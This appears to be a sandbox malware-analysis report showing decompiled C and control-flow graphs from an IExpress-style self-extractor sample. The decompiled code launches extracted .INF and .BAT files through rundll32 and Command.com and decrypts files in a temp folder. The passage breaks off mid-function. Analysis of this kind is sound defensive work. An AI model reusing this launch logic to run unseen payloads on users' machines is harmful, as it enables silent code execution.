                                                                                                                                                                                                        control_flow_graph 141 de1ae8-de1b2c call de1680 144 de1b2e-de1b39 141->144 145 de1b3b-de1b40 141->145 146 de1b46-de1b61 call de1a84 144->146 145->146 149 de1b9f-de1bc2 call de1781 call de658a 146->149 150 de1b63-de1b65 146->150 157 de1bc7-de1bd3 call de66c8 149->157 152 de1b68-de1b6d 150->152 152->152 154 de1b6f-de1b74 152->154 154->149 156 de1b76-de1b7b 154->156 158 de1b7d-de1b81 156->158 159 de1b83-de1b86 156->159 166 de1bd9-de1bf1 CompareStringA 157->166 167 de1d73-de1d7f call de66c8 157->167 158->159 162 de1b8c-de1b9d call de1680 158->162 159->149 160 de1b88-de1b8a 159->160 160->149 160->162 162->157 166->167 168 de1bf7-de1c07 GetFileAttributesA 166->168 175 de1df8-de1e09 LocalAlloc 167->175 176 de1d81-de1d99 CompareStringA 167->176 170 de1c0d-de1c15 168->170 171 de1d53-de1d5e 168->171 170->171 174 de1c1b-de1c33 call de1a84 170->174 173 de1d64-de1d6e call de44b9 171->173 191 de1e94-de1ea4 call de6ce0 173->191 187 de1c35-de1c38 174->187 188 de1c50-de1c61 LocalAlloc 174->188 179 de1e0b-de1e1b GetFileAttributesA 175->179 180 de1dd4-de1ddf 175->180 176->175 177 de1d9b-de1da2 176->177 183 de1da5-de1daa 177->183 185 de1e1d-de1e1f 179->185 186 de1e67-de1e73 call de1680 179->186 180->173 183->183 189 de1dac-de1db4 183->189 185->186 192 de1e21-de1e3e call de1781 185->192 197 de1e78-de1e84 call de2aac 186->197 193 de1c3a 187->193 194 de1c40-de1c4b call de1a84 187->194 188->180 196 de1c67-de1c72 188->196 195 de1db7-de1dbc 189->195 192->197 211 de1e40-de1e43 192->211 193->194 194->188 195->195 201 de1dbe-de1dd2 LocalAlloc 195->201 202 de1c79-de1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->202 203 de1c74 196->203 210 de1e89-de1e92 197->210 201->180 207 de1de1-de1df3 call de171e 201->207 208 de1cf8-de1d07 202->208 209 de1cc2-de1ccc 202->209 203->202 207->210 213 de1d09-de1d21 GetShortPathNameA 208->213 214 de1d23 208->214 216 de1cce 209->216 217 de1cd3-de1cf3 call de1680 * 2 209->217 210->191 211->197 212 de1e45-de1e65 call de16b3 * 2 211->212 212->197 219 de1d28-de1d2b 213->219 214->219 216->217 217->210 223 de1d2d 219->223 224 de1d32-de1d4e call de171e 219->224 223->224 224->210
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E00DE1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E00DE1A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E00DE1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        					E00DE658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E00DE1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E00DE66C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E00DE66C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E00DE1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E00DE1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E00DE16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E00DE16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E00DE2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E00DE171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t140 = 0x525;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t60 =  &_v268;
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t140 = "[";
                                                                                                                                                                                                        								_v1556 = _t151;
                                                                                                                                                                                                        								_t90 = E00DE1A84( &_v1556, "[");
                                                                                                                                                                                                        								if(_t90 != 0) {
                                                                                                                                                                                                        									if( *_t90 != 0) {
                                                                                                                                                                                                        										_v1556 = _t90;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "]";
                                                                                                                                                                                                        									E00DE1A84( &_v1556, "]");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E00DE44B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0xde9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xde1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0xde9a34 =  *0xde9a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0xde9a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E00DE171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0xde9a34 =  *0xde9a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E00DE1680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E00DE1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E00DE6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x00de1af3
                                                                                                                                                                                                        0x00de1afa
                                                                                                                                                                                                        0x00de1b07
                                                                                                                                                                                                        0x00de1b09
                                                                                                                                                                                                        0x00de1b1a
                                                                                                                                                                                                        0x00de1b20
                                                                                                                                                                                                        0x00de1b2c
                                                                                                                                                                                                        0x00de1b3b
                                                                                                                                                                                                        0x00de1b40
                                                                                                                                                                                                        0x00de1b2e
                                                                                                                                                                                                        0x00de1b2e
                                                                                                                                                                                                        0x00de1b33
                                                                                                                                                                                                        0x00de1b33
                                                                                                                                                                                                        0x00de1b46
                                                                                                                                                                                                        0x00de1b4c
                                                                                                                                                                                                        0x00de1b52
                                                                                                                                                                                                        0x00de1b57
                                                                                                                                                                                                        0x00de1b5d
                                                                                                                                                                                                        0x00de1b61
                                                                                                                                                                                                        0x00de1b9f
                                                                                                                                                                                                        0x00de1b9f
                                                                                                                                                                                                        0x00de1bb1
                                                                                                                                                                                                        0x00de1bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1b63
                                                                                                                                                                                                        0x00de1b63
                                                                                                                                                                                                        0x00de1b65
                                                                                                                                                                                                        0x00de1b68
                                                                                                                                                                                                        0x00de1b68
                                                                                                                                                                                                        0x00de1b6a
                                                                                                                                                                                                        0x00de1b6b
                                                                                                                                                                                                        0x00de1b6f
                                                                                                                                                                                                        0x00de1b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1b76
                                                                                                                                                                                                        0x00de1b7b
                                                                                                                                                                                                        0x00de1b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1b8c
                                                                                                                                                                                                        0x00de1b8c
                                                                                                                                                                                                        0x00de1b98
                                                                                                                                                                                                        0x00de1bc7
                                                                                                                                                                                                        0x00de1bc9
                                                                                                                                                                                                        0x00de1bcc
                                                                                                                                                                                                        0x00de1bd3
                                                                                                                                                                                                        0x00de1d75
                                                                                                                                                                                                        0x00de1d76
                                                                                                                                                                                                        0x00de1d78
                                                                                                                                                                                                        0x00de1d7f
                                                                                                                                                                                                        0x00de1e05
                                                                                                                                                                                                        0x00de1e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1e12
                                                                                                                                                                                                        0x00de1e1b
                                                                                                                                                                                                        0x00de1e73
                                                                                                                                                                                                        0x00de1e21
                                                                                                                                                                                                        0x00de1e21
                                                                                                                                                                                                        0x00de1e28
                                                                                                                                                                                                        0x00de1e37
                                                                                                                                                                                                        0x00de1e3e
                                                                                                                                                                                                        0x00de1e52
                                                                                                                                                                                                        0x00de1e60
                                                                                                                                                                                                        0x00de1e60
                                                                                                                                                                                                        0x00de1e3e
                                                                                                                                                                                                        0x00de1e79
                                                                                                                                                                                                        0x00de1e7b
                                                                                                                                                                                                        0x00de1e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1d9b
                                                                                                                                                                                                        0x00de1d9b
                                                                                                                                                                                                        0x00de1da0
                                                                                                                                                                                                        0x00de1da2
                                                                                                                                                                                                        0x00de1da5
                                                                                                                                                                                                        0x00de1da5
                                                                                                                                                                                                        0x00de1da7
                                                                                                                                                                                                        0x00de1da8
                                                                                                                                                                                                        0x00de1dac
                                                                                                                                                                                                        0x00de1dae
                                                                                                                                                                                                        0x00de1db4
                                                                                                                                                                                                        0x00de1db7
                                                                                                                                                                                                        0x00de1db7
                                                                                                                                                                                                        0x00de1db9
                                                                                                                                                                                                        0x00de1dba
                                                                                                                                                                                                        0x00de1dbe
                                                                                                                                                                                                        0x00de1dc3
                                                                                                                                                                                                        0x00de1dce
                                                                                                                                                                                                        0x00de1dd2
                                                                                                                                                                                                        0x00de1deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1dd2
                                                                                                                                                                                                        0x00de1bf7
                                                                                                                                                                                                        0x00de1bfe
                                                                                                                                                                                                        0x00de1c07
                                                                                                                                                                                                        0x00de1d55
                                                                                                                                                                                                        0x00de1d5a
                                                                                                                                                                                                        0x00de1d5b
                                                                                                                                                                                                        0x00de1d5d
                                                                                                                                                                                                        0x00de1d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1c1b
                                                                                                                                                                                                        0x00de1c1b
                                                                                                                                                                                                        0x00de1c20
                                                                                                                                                                                                        0x00de1c2c
                                                                                                                                                                                                        0x00de1c33
                                                                                                                                                                                                        0x00de1c38
                                                                                                                                                                                                        0x00de1c3a
                                                                                                                                                                                                        0x00de1c3a
                                                                                                                                                                                                        0x00de1c40
                                                                                                                                                                                                        0x00de1c4b
                                                                                                                                                                                                        0x00de1c4b
                                                                                                                                                                                                        0x00de1c5d
                                                                                                                                                                                                        0x00de1c61
                                                                                                                                                                                                        0x00de1dd4
                                                                                                                                                                                                        0x00de1dd4
                                                                                                                                                                                                        0x00de1dd6
                                                                                                                                                                                                        0x00de1ddb
                                                                                                                                                                                                        0x00de1ddc
                                                                                                                                                                                                        0x00de1dde
                                                                                                                                                                                                        0x00de1d64
                                                                                                                                                                                                        0x00de1d64
                                                                                                                                                                                                        0x00de1d67
                                                                                                                                                                                                        0x00de1d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1c67
                                                                                                                                                                                                        0x00de1c67
                                                                                                                                                                                                        0x00de1c6d
                                                                                                                                                                                                        0x00de1c72
                                                                                                                                                                                                        0x00de1c74
                                                                                                                                                                                                        0x00de1c74
                                                                                                                                                                                                        0x00de1c8e
                                                                                                                                                                                                        0x00de1c99
                                                                                                                                                                                                        0x00de1cc0
                                                                                                                                                                                                        0x00de1cf8
                                                                                                                                                                                                        0x00de1d07
                                                                                                                                                                                                        0x00de1d23
                                                                                                                                                                                                        0x00de1d09
                                                                                                                                                                                                        0x00de1d14
                                                                                                                                                                                                        0x00de1d1b
                                                                                                                                                                                                        0x00de1d1b
                                                                                                                                                                                                        0x00de1d2b
                                                                                                                                                                                                        0x00de1d2d
                                                                                                                                                                                                        0x00de1d2d
                                                                                                                                                                                                        0x00de1d38
                                                                                                                                                                                                        0x00de1d39
                                                                                                                                                                                                        0x00de1d46
                                                                                                                                                                                                        0x00de1cc2
                                                                                                                                                                                                        0x00de1cc2
                                                                                                                                                                                                        0x00de1ccc
                                                                                                                                                                                                        0x00de1cce
                                                                                                                                                                                                        0x00de1cce
                                                                                                                                                                                                        0x00de1cdb
                                                                                                                                                                                                        0x00de1ce6
                                                                                                                                                                                                        0x00de1cee
                                                                                                                                                                                                        0x00de1cee
                                                                                                                                                                                                        0x00de1e89
                                                                                                                                                                                                        0x00de1e91
                                                                                                                                                                                                        0x00de1e92
                                                                                                                                                                                                        0x00de1e94
                                                                                                                                                                                                        0x00de1e97
                                                                                                                                                                                                        0x00de1ea4
                                                                                                                                                                                                        0x00de1ea4
                                                                                                                                                                                                        0x00de1c61
                                                                                                                                                                                                        0x00de1c07
                                                                                                                                                                                                        0x00de1bd3
                                                                                                                                                                                                        0x00de1b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00DE1BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00DE1BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00DE1C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00DE1C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00DE1140,00000000,00000008,?), ref: 00DE1CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00DE1D1B
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-2247772235
                                                                                                                                                                                                        • Opcode ID: 5bdb258d83ef6490758e9dbb4b63837c3ab7005b35a85f21b99016198295535c
                                                                                                                                                                                                        • Instruction ID: cafb848776640926ae7b353c6e081240d70aa1968f9b4cce17169d86ad17a59c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bdb258d83ef6490758e9dbb4b63837c3ab7005b35a85f21b99016198295535c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DA13978B003D45BEB20BB26CC45BEA7769DB55310F180299F595E72C0DBB09E85CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 de2f1d-de2f3d 407 de2f3f-de2f46 406->407 408 de2f6c-de2f73 call de5164 406->408 410 de2f5f-de2f66 call de3a3f 407->410 411 de2f48 call de51e5 407->411 415 de2f79-de2f80 call de55a0 408->415 416 de3041 408->416 410->408 410->416 417 de2f4d-de2f4f 411->417 415->416 424 de2f86-de2fbe GetSystemDirectoryA call de658a LoadLibraryA 415->424 420 de3043-de3053 call de6ce0 416->420 417->416 421 de2f55-de2f5d 417->421 421->408 421->410 428 de2ff7-de3004 FreeLibrary 424->428 429 de2fc0-de2fd4 GetProcAddress 424->429 431 de3006-de300c 428->431 432 de3017-de3024 SetCurrentDirectoryA 428->432 429->428 430 de2fd6-de2fee DecryptFileA 429->430 430->428 445 de2ff0-de2ff5 430->445 431->432 435 de300e call de621e 431->435 433 de3026-de303c call de44b9 call de6285 432->433 434 de3054-de305a 432->434 433->416 439 de305c call de3b26 434->439 440 de3065-de306c 434->440 441 de3013-de3015 435->441 451 de3061-de3063 439->451 442 de306e-de3075 call de256d 440->442 443 de307c-de3089 440->443 441->416 441->432 452 de307a 442->452 448 de308b-de3091 443->448 449 de30a1-de30a9 443->449 445->428 448->449 453 de3093 call de3ba2 448->453 455 de30ab-de30ad 449->455 456 de30b4-de30b7 449->456 451->416 451->440 452->443 459 de3098-de309a 453->459 455->456 458 de30af call de4169 455->458 456->420 458->456 459->416 461 de309c 459->461 461->449
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xde8a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E00DE5164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E00DE6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E00DE55A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E00DE658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0xdea288("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0xde8a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0xde8a2c - _t44; // 0x0
